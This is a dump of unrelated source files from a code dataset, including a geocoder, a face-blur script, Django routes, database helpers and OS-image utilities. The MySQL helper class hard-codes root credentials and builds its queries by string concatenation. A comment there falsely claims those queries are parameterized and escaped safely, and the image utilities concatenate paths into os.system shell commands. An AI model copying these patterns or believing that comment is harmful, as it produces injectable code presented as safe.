We're\n # testing that the initial AssertionError triggered below is\n # propagated up the stack, not the second exception triggered\n # during commit.\n aw.rollback = lambda: 1 / 0\n # Now trigger our own exception.\n assert False, \"Intentional failure for testing purposes\"\n\n\ndef test_atomic_write_in_pwd(tmpdir):\n orig_curdir = os.getcwd()\n try:\n os.chdir(str(tmpdir))\n fname = 'ha'\n for i in range(2):\n with atomic_write(str(fname), overwrite=True) as f:\n f.write('hoho')\n\n with pytest.raises(OSError) as excinfo:\n with atomic_write(str(fname), overwrite=False) as f:\n f.write('haha')\n\n assert excinfo.value.errno == errno.EEXIST\n\n assert open(fname).read() == 'hoho'\n assert len(tmpdir.listdir()) == 1\n finally:\n os.chdir(orig_curdir)\n","sub_path":"contrib/python/atomicwrites/tests/test_atomicwrites.py","file_name":"test_atomicwrites.py","file_ext":"py","file_size_in_byte":2729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"176889899","text":"import json\nimport logging\nimport os\nimport re\n\nimport spacy\nimport tqdm\n\nimport utils\n\nlogger = logging.getLogger(__name__)\nFILE_PATH = os.path.dirname(os.path.realpath(__file__))\n\n\n# avoid = set(json.load(open(os.path.join(FILE_PATH,\"obj\",\"avoid_locations.json\"),'r')))\n\n# avoid = [a.lower() for a in avoid]\n\n# print(\"Loading locations\")\n#\n\ndef combine(lst, num):\n logger.info('')\n \"\"\"\n Takes in a list\n [1,2,3,4,5]\n and based on the num returns all possible neighbouring pairs\n [[1,2],[2,3],[3,4],[4,5]].\n :param lst: input list\n :param num: number of neighbouring pairs\n :return: list.\n \"\"\"\n if len(lst) < num:\n raise Exception(\"Cannot have more neighbours than length of list.\")\n out = []\n for i in range(len(lst) - num + 1):\n out.append(lst[i:i + num])\n return out\n\n\ndef string_combinations(string, max_words):\n logger.info('')\n \"\"\"\n Takes a string text and creates a list of all possible neighbouring strings.\n :param string: Input string\n :param max_words: Number of neighbouring strings\n :return: list\n \"\"\"\n if max_words == 0:\n return None\n s = re.findall(r\"[\\w']+\", string)\n r = combine(s, max_words)\n return [utils.clean_string(' '.join(a)) for a in r]\n\n\ndef all_combinations(string, max_words):\n logger.info('')\n \"\"\"\n Creates list of i=1, i=2, i=3, to i=max_words combinations of words in string.\n :param string: String text\n :param max_words: Integer number of max neighbouring words.\n :return: List of all combinations.\n \"\"\"\n out = []\n i = 0\n while i < max_words:\n i += 1\n out = out + string_combinations(string, i)\n return out\n\n\ndef all_stopwords():\n logger.info('')\n \"\"\"\n Gets stopwords from json file.\n :return: set of stopwords\n \"\"\"\n sws = json.loads(open(os.path.join(FILE_PATH, \"obj\", 'stopwords-all.json'), 'rb').read())\n out = [sws[a] for a in sws]\n sws = []\n for l in out:\n sws += l\n sws = set(sws)\n return sws\n\n\ndef all_english_words():\n logger.info('')\n words = [w.split(',')[0].replace('\"', '').lower()\n for w in open(os.path.join(FILE_PATH, \"obj\", 'dictionary.csv'), 'r').readlines()]\n return set(words)\n\n\n# noinspection PyShadowingNames\ndef all_surnames():\n logger.info('')\n surnames = [w.split(',')[0].lower()\n for w in open(os.path.join(FILE_PATH, \"obj\", 'surnames.csv'), 'r').readlines()]\n return set(surnames)\n\n\n# noinspection PyShadowingNames\ndef all_firstnames():\n logger.info('')\n firstnames = [w.split(',')[0].lower()\n for w in 
open(os.path.join(FILE_PATH, \"obj\", 'first_names.csv'), 'r').readlines()]\n return set(firstnames)\n\n\n# english_words = all_english_words()\n# stopwords = all_stopwords()\n# surnames = all_surnames()\n# firstnames = all_firstnames()\n\nclass LocationLoader:\n \"\"\"\n Geoextraction class that loads location data from files and puts them into RAM.\n \"\"\"\n\n def __init__(self):\n logger.info('')\n self.lookup_id = 0\n self.locations, self.locations_lookup, self.countries_cca2 = self.load_locations()\n self.locations_lookup_set = set(self.locations_lookup.keys())\n\n def load_locations(self):\n logger.info('')\n \"\"\"\n Function that loads countries, cities and states from files and returns two dictionaries:\n First dictionary:\n -keys are lookup ids\n -values are location data (common name, latitude, longtitude, population, type [country, city, state])\n Second dictionary:\n -keys are all different location names (UK, United Kingdom, England, f.e.)\n -values are lookup ids\n\n This enables fast checking if a random word is in fact a location (using common set elements),\n and in-turn fast lookup using the lookup id.\n :return:\n \"\"\"\n print(\"Loading locations...\")\n countries, countries_lookup, countries_cca2 = self.load_countries()\n # print()\n cities, cities_lookup = self.load_cities()\n states, states_lookup = self.load_states()\n location_dict = {**cities, **states, **countries}\n lookup_dict = {**cities_lookup, **states_lookup, **countries_lookup}\n lookup_dict = {k.lower(): v for k, v in lookup_dict.items()}\n\n del (lookup_dict[\"\"]) # TODO: Fix this (better parsing)\n print(\"...Done!\")\n\n return location_dict, lookup_dict, countries_cca2\n\n def load_countries(self):\n logger.info('')\n \"\"\"\n Loads countries from file and generates two dictionaries.\n First dictionary:\n -keys are lookup ids\n -values are location data\n Second dictionary:\n -keys are all different location names\n -values are lookup ids\n :return: dict, dict\n \"\"\"\n countries = {}\n countries_lookup = {}\n countries_cca2 = {}\n f = open(os.path.join(FILE_PATH, 'obj', 'countries.json'), 'r', encoding='utf-8').read()\n j = json.loads(f)\n for c in j:\n self.lookup_id += 1\n if len(c['latlng']) > 0:\n lat, lng, cca2, cca3 = c['latlng'][0], c['latlng'][1], c['cca2'], c['cca3']\n countries[self.lookup_id] = {'location': c['name']['common'], 'lat': lat, 'lng': lng,\n 'type': 'country', 'area': c['area']}\n # print(c['name']['common'])\n for k, v in c['name'].items():\n if isinstance(v, dict):\n for k1, v1 in v.items():\n for k2, v2 in v1.items():\n countries_lookup[v2] = self.lookup_id\n else:\n # print(\" \"+v)\n countries_lookup[v] = self.lookup_id\n for n in c['altSpellings']:\n countries_lookup[n] = self.lookup_id\n\n countries_cca2[cca2] = self.lookup_id\n # else:\n # logger.warning(\"country \"+c['name']['common']+' has no latlng')\n return countries, countries_lookup, countries_cca2\n\n def load_cities(self, min_population=0):\n logger.info('')\n \"\"\"\n Loads cities from file and generates two dictionaries.\n First dictionary:\n -keys are lookup ids\n -values are location data\n Second dictionary:\n -keys are all different location names\n -values are lookup ids\n :return: dict, dict\n \"\"\"\n f = open(os.path.join(FILE_PATH, 'obj', 'cities1000.txt'), 'r', encoding='utf-8')\n cities = {}\n cities_lookup = {}\n for l in f.readlines():\n split = l.split(';')\n go = False\n population, lat, lng, ascii_name, alternate_names, admin_region, name, country_code = None, None, None, None, None, 
None, None, None\n if len(split) == 19:\n idn, name, ascii_name, alternate_names, lat, lng, feat_class, feat_code, \\\n country_code, a1, a2, a3, a4, a5, population, dem, elevation, admin_region, mod_date = split\n go = True\n elif len(split) == 17:\n idn, name, ascii_name, alternate_names, lat, lng, feat_class, feat_code, \\\n country_code, a1, a2, a3, population, dem, elevation, admin_region, mod_date = split\n go = True\n if go:\n admin_region_splitted = admin_region.split(\"/\")\n state = None\n county = None\n continent = None\n if len(admin_region_splitted) == 2:\n continent, county = admin_region_splitted\n elif len(admin_region_splitted) == 3:\n continent, state, county = admin_region_splitted\n self.lookup_id += 1\n population = int(population)\n if population >= min_population:\n lat = float(lat)\n lng = float(lng)\n\n cities[self.lookup_id] = {'location': name,\n 'lat': lat,\n 'lng': lng,\n 'population': population,\n 'type': 'city',\n 'country': country_code,\n 'continent': continent,\n \"county\": county}\n if state:\n cities[self.lookup_id]['state'] = state\n\n all_possible_names = [name, ascii_name] + [n for n in alternate_names.split(',')]\n for n in all_possible_names:\n if n not in cities_lookup:\n cities_lookup[n] = self.lookup_id\n if population > cities[cities_lookup[n]]['population']:\n cities_lookup[n] = self.lookup_id\n\n return cities, cities_lookup\n\n def load_states(self):\n logger.info('')\n \"\"\"\n Loads states from file and generates two dictionaries.\n First dictionary:\n -keys are lookup ids\n -values are location data\n Second dictionary:\n -keys are all different location names\n -values are lookup ids\n :return: dict, dict\n \"\"\"\n f = open(os.path.join(FILE_PATH, \"obj\", \"states.json\"), 'r')\n j = json.loads(f.read())\n states = {}\n states_lookup = {}\n for i in range(len(j)):\n self.lookup_id += 1\n states[self.lookup_id] = {'location': j[i]['state'], 'lat': j[i]['latitude'], 'lng': j[i]['longitude'],\n 'type': 'state', \"country\": \"US\"}\n states_lookup[j[i]['state']] = self.lookup_id\n return states, states_lookup\n\n def get_lookup_id(self, string):\n if string.lower() in self.locations_lookup:\n ids = self.locations_lookup[string.lower()]\n logger.debug(string + '-->' + str(ids))\n return ids\n return None\n\n def get_location_from_id(self, str_id):\n\n if str_id in self.locations:\n out = self.locations[str_id]\n # print(out)\n logger.debug(\n str(str_id) + '-->' + out['location'] + '(lat:' + str(out['lat']) + ',lng:' + str(out['lng']) + ')')\n return out\n return None\n\n def get_location(self, string):\n logger.debug('')\n lookup_id = self.get_lookup_id(string)\n if lookup_id:\n loc = self.get_location_from_id(lookup_id)\n if loc:\n return loc\n return None\n\n\ndef get_locations(article_list, location_loader, nlp):\n logger.info('')\n \"\"\"\n Takes in a string and outputs list of locations that are present in string.\n :param logger_internal:\n :param location_loader:\n :param string: String to be parsed.\n :return: list of a single dictionary per location\n \"\"\"\n\n t = tqdm.tqdm(\n total=len(article_list),\n bar_format=\"Spacy processing |{bar}|{n_fmt}/{total_fmt} {percentage:3.0f}% {rate_fmt}\")\n\n for a in article_list:\n\n string = a['title']\n if \"description\" in a:\n string += \". 
\" + a[\"description\"]\n doc = nlp(string)\n matches = [ent.text for ent in doc.ents if ent.label_ == \"LOC\" or ent.label_ == \"GPE\"]\n occuring_ids = {}\n for name in matches:\n count = string.count(name)\n lookup_id = location_loader.get_lookup_id(name)\n if lookup_id != None:\n if lookup_id in occuring_ids:\n occuring_ids[lookup_id] += count\n else:\n occuring_ids[lookup_id] = count\n out = []\n for occurring_id, count in occuring_ids.items():\n d = location_loader.get_location_from_id(occurring_id)\n d['count'] = count\n out.append(d)\n out.sort(key=lambda x: x['count'], reverse=True)\n # logstring= '\\n'+string+'\\n'+str(matches)+'\\n'+str([l for l in out])\n # logstring = logstring.encode().decode(\"ascii\",'replace')\n # logger_internal.info(logstring)\n a['locations'] = out\n t.update()\n t.close()\n return article_list\n\n\ndef string_found(substring, string):\n logger.info('')\n \"\"\"Returns True if substring word is found within a string sentence\n (has to be surrounded by whitespace).\n \n \n Arguments:\n substring {str} -- word\n string {str} -- sentence\n \n Returns:\n bool -- True or False\n \"\"\"\n if re.search(r\"\\b\" + re.escape(substring) + r\"\\b\", string):\n return True\n return False\n\n\ndef geocode_results(articles,location_loader=None):\n logger.info('')\n \"\"\"\n Function that takes a list of article dictionaries,\n and returns the same list with updated article dictionaries, that now include geo data.\n :param articles: list of dicts\n :return: list of dicts (geocoded)\n \"\"\"\n\n # log_path = os.path.join(FILE_PATH,'logs','locations','%s.log' % utils.date_to_string(datetime.datetime.now(),'%Y-%m-%dT%H-%M-%SZ'))\n # fh = logging.FileHandler(log_path,'w','utf-8')\n # old_handlers = logger.handlers\n # logger.handlers = []\n # logger.addHandler(fh)\n # logger.propagate = False\n if not location_loader:\n logger.warning('Loading location loader from within this function, is unoptimised behaviour.')\n location_loader = LocationLoader()\n nlp = spacy.load('en', disable=['parser', 'tagger', 'textcat', 'tokenizer'])\n articles_tagged = get_locations(articles, location_loader, nlp)\n return articles_tagged\n\n\ndef geocode_string(string):\n logger.info('')\n # locations,locations_lookup,locations_lookup_set,countries_cca2 = load_locations_dicts()\n location_loader = LocationLoader()\n nlp = spacy.load('en', disable=['parser', 'tagger', 'textcat', 'tokenizer'])\n return get_locations([{'title': string}], location_loader, nlp)\n\n# print(geocode_string('Tunisia'))\n","sub_path":"locations.py","file_name":"locations.py","file_ext":"py","file_size_in_byte":14233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"625395583","text":"\"\"\"Crops and rotates Vuze images\"\"\"\n\nimport os\nimport cv2\nimport argparse\nimport multiprocessing as mp\nfrom multiprocessing import Queue\n\nfrom datetime import datetime\nstartTime = datetime.now()\n\ndef face_proc(q):\n while True:\n try:\n fname = q.get(True, 1)\n print('Processing : ' + input_path + '/' + fname)\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n H, W = img.shape[:2]\n\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.1,\n minNeighbors=5,\n minSize=(1,1),\n flags = cv2.CASCADE_SCALE_IMAGE\n )\n for (x, y, w, h) in faces:\n res = cv2.blur(img[y:y+h, x:x+w] , (35,35))\n cv2.rectangle(img, (x, y), (x+w, y+h), (0, 255, 0), 2)\n img[y:y+h, x:x+w] = res\n\n out_fname = \"../\" + output_folder + '/' + fname\n if 
os.path.isfile(out_fname):\n continue\n cv2.imwrite(out_fname, img)\n \n except:\n return\n\nparser = argparse.ArgumentParser(\"Detects faces in panos\")\nparser.add_argument('input_path', type=str, help='Path to folder containing the images')\nparser.add_argument('output_folder', type=str, help='Output folder')\nargs = parser.parse_args()\n\nprint(\"Path : \" + args.input_path)\nif not os.path.exists(args.input_path):\n parser.error(\"Input folder does not exist or does not contain any images\")\nprint(args.input_path)\n\ninput_path = args.input_path\noutput_folder = args.output_folder\nos.chdir(input_path)\nif not os.path.exists(\"../\" + output_folder):\n os.mkdir(\"../\" + output_folder)\n\ncascPath = \"../haarcascade_frontalface_default.xml\"\nfaceCascade = cv2.CascadeClassifier(cascPath)\n\ntotal_frames = len(os.listdir())\nq = Queue()\n\nnum_procs = 8\nprocs = []\n\nfor i in range(num_procs):\n p = mp.Process(target=face_proc, args=(q,))\n procs.append(p)\n p.start()\n\nfnames = [fname for fname in os.listdir() if fname != \".DS_Store\"]\nwhile fnames:\n if q.empty():\n q.put(fnames.pop())\n\nfor p in procs:\n p.join()\n\nprint(datetime.now() - startTime)\n","sub_path":"data/scripts/facedetect_parallel.py","file_name":"facedetect_parallel.py","file_ext":"py","file_size_in_byte":2248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"235338949","text":"\"\"\"car_db URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.9/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. 
Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\nfrom app.views import CarList, DetailsCar, CarCreate, CarUpdate, CarDelete, HomeView, basket, CartView, delete_car_cart, send_order\nurlpatterns = [\n    url(r'^admin/', admin.site.urls),\n    url(r'^$', HomeView.as_view(), name='home'),\n    url(r'^list/$', CarList.as_view() ),\n    url(r'^list/details/(?P<pk>[0-9]+)/$', DetailsCar.as_view()),\n    url(r'^create/$', CarCreate.as_view()),\n    url(r'^update/(?P<pk>[0-9]+)/$', CarUpdate.as_view()),\n    url(r'^delete/(?P<pk>[0-9]+)/$', CarDelete.as_view()),\n    url(r'^list/add/$', basket),\n    url(r'^cart/del/$', delete_car_cart),\n    url(r'^cart/$', CartView.as_view()),\n    url(r'^cart/send/$', send_order),\n    url(r'^i18n/', include('django.conf.urls.i18n')),\n    url(r'^api/',include('api.urls')),\n\n    # url(r'^/?query=([\\w-]+)/$', CarList.as_view()),\n\n]\n\nif settings.DEBUG:\n    urlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n    urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n\n","sub_path":"car_db/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"16126073","text":"from starlette_auth.tables import scope, user_scope, user\nfrom starlette_core.database import database\n\n\nasync def get_user_by_email(email: str):\n    query = user.select().where(user.c.email == email)\n    return await database.fetch_one(query=query)\n\n\nasync def get_user_by_id(id: int):\n    query = user.select().where(user.c.id == id)\n    return await database.fetch_one(query=query)\n\n\nasync def get_user_scopes(id: int):\n    join = scope.join(user_scope)\n    query = scope.select().select_from(join).where(user_scope.c.user_id == id)\n    return await database.fetch_all(query=query)\n\n\nasync def update_user(id: int, **values):\n    query = user.update().values(**values).where(user.c.id == id)\n    return await database.execute(query=query)\n","sub_path":"starlette_auth/utils/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":742,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"480911490","text":"import os\nimport glob\n\nINPUT_DIR = \"videos/inputs\"\nSTR_TO_REPLACE = \"CBBV1 \"\n\ncurrent_path = os.getcwd()\nfiles = glob.glob(\"{}/*\".format(INPUT_DIR))\n\nfor file_ in files:\n    new_file_name = file_.replace(STR_TO_REPLACE, \"\")\n    os.rename(os.path.join(current_path, file_),\n              os.path.join(current_path, new_file_name))\n","sub_path":"file_renamer.py","file_name":"file_renamer.py","file_ext":"py","file_size_in_byte":330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"469478215","text":"import mysql.connector\n\n\nclass Database(object):\n    myDatabase = None\n    my_cursor = None\n\n    def __init__(self):\n        self.myDatabase = mysql.connector.connect(\n            host=\"localhost\",\n            user=\"root\",\n            passwd=\"root\",\n            database=\"corona_bot\"\n        )\n        self.my_cursor = self.myDatabase.cursor()\n\n    def add_status(self, user_id, parent_id):\n        sql = \"INSERT INTO track_user (user_id, parent_id) VALUES (%s, %s)\"\n        val = (user_id, parent_id)\n        self.my_cursor.execute(sql, val)\n        self.myDatabase.commit()\n        print(\"user registered\")\n
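\n    # The lookup/update helpers below pass values through the driver's\n    # parameterized-query mechanism (%s placeholders) rather than string\n    # concatenation, so user-supplied ids are escaped safely.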
str(user_id) + \"'\"\n self.my_cursor.execute(sql)\n my_result = self.my_cursor.fetchall()\n if len(my_result) > 0:\n return True\n else:\n return False\n\n def get_parent_id(self, user_id):\n sql = \"SELECT parent_id FROM track_user WHERE user_id ='\" + str(user_id) + \"'\"\n self.my_cursor.execute(sql)\n my_result = self.my_cursor.fetchall()\n return my_result[0][0]\n\n def update_parent_id(self, user_id, parent_id):\n print(\"From DB:\", parent_id)\n sql = \"Update track_user set parent_id = '\" + str(parent_id) + \"' where user_id = '\" + str(user_id) + \"'\"\n self.my_cursor.execute(sql)\n self.myDatabase.commit()\n","sub_path":"Database.py","file_name":"Database.py","file_ext":"py","file_size_in_byte":1412,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"29060089","text":"# (C) Copyright (2018,2020) Hewlett Packard Enterprise Development LP\n#\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n#\n# The above copyright notice and this permission notice shall be included in\n# all copies or substantial portions of the Software.\n#\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n# THE SOFTWARE.\n\nfrom subprocess import CalledProcessError\nimport shutil\nimport subprocess\nimport threading\nfrom time import sleep\nimport requests\nimport os\nimport json\nfrom datetime import datetime\nfrom datetime import timedelta\n\ndef mount_iso_image(file_name, org_path):\n \"\"\"This function is to mount the file to the desired path\n \n Arguments:\n file_name {string} -- name of the file to be mounted\n org_path {string} -- path of the mount point\n \"\"\"\n create_dir_exist(org_path)\n try:\n args = [\"sudo\", \"mount\", \"-o\", \"loop\", file_name, org_path]\n proc = execute_linux_command(args)\n return proc.returncode\n except CalledProcessError as subprcer:\n print(\"Failure: Subprocess error occurred while mounting iso image {}\".format(subprcer))\n return 1\n except Exception as er:\n print(\"Failure: Error while mounting iso image {}\".format(er))\n return 1\n\n\ndef copy_iso_contents(origpath, newpath):\n \"\"\"This function is to copy the contents of the ISO image to the desired location\n \n Arguments:\n origpath {string} -- source path\n newpath {string} -- destination path\n \"\"\"\n try:\n if os.path.isdir(newpath):\n folder_name = (newpath.split('/'))[2]\n file_path= \"files/\"+folder_name\n if os.path.isdir(file_path):\n os.system(\"sudo rsync -a --remove-source-files \"+newpath+\" files/\"+folder_name+\"/\")\n os.system(\"sudo find \"+newpath+\" -type d -empty -delete\")\n else:\n os.system(\"sudo mv -f \"+newpath+\" files/\")\n shutil.copytree(origpath, newpath)\n except Exception as e:\n print(\"Failure: Error occured 
\n\ndef copy_iso_contents(origpath, newpath):\n    \"\"\"This function is to copy the contents of the ISO image to the desired location\n\n    Arguments:\n        origpath {string} -- source path\n        newpath {string} -- destination path\n    \"\"\"\n    try:\n        if os.path.isdir(newpath):\n            folder_name = (newpath.split('/'))[2]\n            file_path = \"files/\"+folder_name\n            if os.path.isdir(file_path):\n                os.system(\"sudo rsync -a --remove-source-files \"+newpath+\" files/\"+folder_name+\"/\")\n                os.system(\"sudo find \"+newpath+\" -type d -empty -delete\")\n            else:\n                os.system(\"sudo mv -f \"+newpath+\" files/\")\n        shutil.copytree(origpath, newpath)\n    except Exception as e:\n        print(\"Failure: Error occurred while copying iso contents {}\".format(e))\n\n\ndef unmount_iso_image(org_path):\n    \"\"\"This function is to unmount the ISO image on the installer machine\n\n    Arguments:\n        org_path {string} -- path to the mount point\n    \"\"\"\n    try:\n        args = [\"sudo\", \"umount\", org_path]\n        proc = execute_linux_command(args)\n        if proc.returncode == 0:\n            shutil.rmtree(org_path)\n        return proc.returncode\n    except CalledProcessError as subprcer:\n        print(\"Failure: Subprocess error occurred while unmounting iso image {}\".format(subprcer))\n        return 1\n    except Exception as er:\n        print(\"Failure: Error while unmounting iso image {}\".format(er))\n        return 1\n\n\ndef get_custom_image_url(http_url, os_type, server_serial_number):\n    \"\"\"This function is to generate URL for the custom OS ISO file based on the type of OS and server serial number\n\n    Arguments:\n        http_url {string} -- HTTP server base URL\n        os_type {string} -- Type of the operating system\n        server_serial_number {string} -- Server serial number\n\n    Returns:\n        string -- custom ISO URL\n    \"\"\"\n    return http_url + os_type + server_serial_number + \".iso\"\n\n\ndef get_custom_image_path(http_path, os_type, server_serial_number):\n    \"\"\"This function is to generate path for the custom OS ISO file based on the type of OS and server serial number\n\n    Arguments:\n        http_path {string} -- HTTP server base file path\n        os_type {string} -- Type of the operating system\n        server_serial_number {string} -- Server serial number\n\n    Returns:\n        string -- custom ISO path\n    \"\"\"\n    return os.path.join(http_path, os_type + server_serial_number + \".iso\")\n\n\ndef get_custom_image_name(os_type, server_serial_number):\n    \"\"\"This function is to generate name for the custom OS ISO file based on the type of OS and server serial number\n\n    Arguments:\n        os_type {string} -- Type of the operating system\n        server_serial_number {string} -- Server serial number\n\n    Returns:\n        string -- custom ISO filename\n    \"\"\"\n    return os_type + server_serial_number + \".iso\"\n\n\ndef get_custom_kickstart_url(http_url, os_type, server_serial_number):\n    \"\"\"This function is to generate URL for the custom kickstart file based on the type of OS and server serial number\n\n    Arguments:\n        http_url {string} -- HTTP server base URL\n        os_type {string} -- Type of the operating system\n        server_serial_number {string} -- Server serial number\n\n    Returns:\n        string -- custom kickstart URL\n    \"\"\"\n    return http_url + os_type + server_serial_number + \"_ks.cfg\"\n\n\ndef get_custom_kickstart_path(http_path, os_type, server_serial_number):\n    \"\"\"This function is to generate path for the custom kickstart file based on the type of OS and server serial number\n\n    Arguments:\n        http_path {string} -- HTTP server base file path\n        os_type {string} -- Type of the operating system\n        server_serial_number {string} -- Server serial number\n\n    Returns:\n        string -- custom kickstart path\n    \"\"\"\n    return os.path.join(http_path, os_type + server_serial_number + \"_ks.cfg\")\n\n\ndef get_custom_kickstart_name(os_type, server_serial_number):\n    \"\"\"This function is to generate a name for the custom kickstart file based on the type of OS and server serial number\n\n    Arguments:\n        os_type {string} -- Type of the operating system - RHEL\n        server_serial_number {string} -- Server serial number\n\n    Returns:\n        string -- custom kickstart filename\n    \"\"\"\n    return os_type + server_serial_number + \"_ks.cfg\"\n
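\n# How the naming helpers compose (illustrative values, not project defaults):\n#   get_custom_image_url(\"http://10.0.1.5/ws/\", \"rhel\", \"SGH829X\")\n#       -> \"http://10.0.1.5/ws/rhelSGH829X.iso\"\n#   get_custom_kickstart_name(\"rhel\", \"SGH829X\")\n#       -> \"rhelSGH829X_ks.cfg\"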
\n\ndef create_dir_exist(dir_path):\n    \"\"\"This function is to create a folder if it doesn't already exist\n\n    Arguments:\n        dir_path {string} -- Path to a folder to be created\n    \"\"\"\n    try:\n        if not os.path.isdir(dir_path):\n            os.makedirs(dir_path)\n    except Exception as er:\n        print(\"Failure: Error occurred while creating the dir {}\".format(er))\n\n\ndef move_file(filepath):\n    \"\"\"This function is to move a file to temp folder\n\n    Arguments:\n        filepath {string} -- Path of a file to be moved\n    \"\"\"\n    try:\n        if os.path.exists(filepath):\n            os.system(\"sudo mv -f \" + filepath + \" files/\")\n    except Exception as e:\n        print(\"Failure: Error occurred while moving the file {}\".format(e))\n\ndef move_on_exist_file(file_path):\n    \"\"\"This function is to move an existing file\n\n    Arguments:\n        file_path {string} -- Path of an existing file to be moved\n    \"\"\"\n    try:\n        print(\"Searching file {}\".format(file_path))\n        if os.path.isfile(file_path):\n            move_file(file_path)\n    except Exception as er:\n        print(\"Failure: Error occurred while moving the file {}\".format(er))\n\n\ndef move_temp_folder(temppath):\n    \"\"\"\n    This function is to move a folder\n    Arguments:\n        temppath {string} -- Path of the folder to be moved\n    \"\"\"\n    try:\n        isDir = os.path.isdir(temppath)\n        if isDir:\n            os.system(\"sudo mv -f \" + temppath + \" files/\")\n    except Exception as ex:\n        print(\"Failure: Error occurred while moving {}\".format(ex))\n\n\ndef execute_linux_command(args):\n    \"\"\"\n    This function is to execute linux commands\n    \"\"\"\n    return subprocess.run(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, check=True)\n\n\ndef is_iso_image(filename):\n    \"\"\"\n    This function is to check if the given filename is an ISO image\n    Arguments:\n        filename {string} -- file name of the ISO image\n\n    Returns:\n        Boolean -- Returns True if the given filename is an ISO image and False if it is not\n    \"\"\"\n    try:\n        if os.path.splitext(filename)[1] == \".iso\":\n            return True\n        return False\n    except Exception as e:\n        print(\"Failure: Error occurred while validating iso image filename {}\".format(e))\n        return False\n
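\n# e.g. (illustrative): is_iso_image(\"rhelSGH829X.iso\") -> True,\n#      is_iso_image(\"rhelSGH829X_ks.cfg\") -> False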
\n\ndef is_iso_file_present(image_url):\n    \"\"\"\n\n    Arguments:\n        image_url {string} -- URL of the OS image\n\n    Returns:\n        Boolean -- Returns True if the ISO file is present on the remote location. Returns False if the ISO image is not present on the remote location\n    \"\"\"\n    try:\n        requests.packages.urllib3.disable_warnings()\n        file_head = requests.head(image_url, verify=False)\n        if file_head.status_code == 200:\n            return True\n    except Exception as e:\n        print(\"Failure: ISO file not present on the remote location {}\".format(e))\n        return False\n    return False","sub_path":"DL/scalable/os_deployment/deploy_esxi/image_operations.py","file_name":"image_operations.py","file_ext":"py","file_size_in_byte":9534,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
+{"seq_id":"140595110","text":"import re\nfrom pyspark import SparkConf, SparkContext\nconf = SparkConf()\nsc = SparkContext(conf = conf)\n\nA = sc.textFile(\"A.txt\")\nB = sc.textFile(\"B.txt\")\n\nmat = A.map(lambda l: re.split(\",\", l))\nmat = mat.map(lambda l: [int(e) for e in l])\n\n\ndef reduce_j(l):\n    for e in l:\n        yield e[1][1], (e[0], e[1][0])\n\n\nmat1 = mat.map(lambda l: [(l[0], (l[i], i)) for i in range(1, len(l))])\nmat2 = mat1.flatMap(lambda l: reduce_j(l))\n\nvec = B.map(lambda l: re.split(\",\", l))\nvec = vec.map(lambda l: [int(e) for e in l])\nvec1 = vec.flatMap(lambda l: [(i, l[i]) for i in range(1, len(l))])\n\nmat3 = mat2.join(vec1)\nmat4 = mat3.map(lambda l: (l[1][0][0], l[1][0][1] * l[1][1]))\nprod = mat4.reduceByKey(lambda x, y: x+y)\n\nprint(\"The matrix A is:\", mat.collect())\nprint(\"The vector B is:\", vec.collect())\nprint(\"Product of matrix and vector is:\", prod.collect())\n","sub_path":"HW4/spark_matrix_multiplication.py","file_name":"spark_matrix_multiplication.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"}
